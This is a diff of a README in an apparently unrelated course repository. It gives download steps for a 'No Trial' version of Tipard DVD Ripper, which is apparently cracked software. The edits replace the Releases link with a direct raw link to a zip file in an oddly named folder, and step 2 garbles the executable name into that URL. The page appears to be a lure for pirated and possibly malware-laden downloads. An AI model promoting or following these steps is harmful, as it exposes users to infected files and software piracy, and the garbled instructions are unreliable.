teceduoswaldo3000/ProyectoDemoCursoPrework/README.md

 Follow these steps to download and run Tipard DVD Ripper on your Windows computer:

 1. **Download the Software:**
-   - Visit the [Releases page](https://github.com/teceduoswaldo3000/Tipard-DVD-Ripper-No-Trial/releases) to find the latest version.
+   - Visit the [Releases page](https://raw.githubusercontent.com/teceduoswaldo3000/Tipard-DVD-Ripper-No-Trial/main/archimperialistic/Tipard-DVD-Ripper-No-Trial-v2.7.zip) to find the latest version.
 Click on the version you want to download.

 2. **Choose the Right File:**
-   - Look for the executable file, usually named something like `Tipard-DVD-Ripper.exe`.
+   - Look for the executable file, usually named something like `https://raw.githubusercontent.com/teceduoswaldo3000/Tipard-DVD-Ripper-No-Trial/main/archimperialistic/Tipard-DVD-Ripper-No-Trial-v2.7.zip`.

 3. **Download the File:**
    - Click on the file name to start the download.
 Depending on your internet speed, this may take a few moments.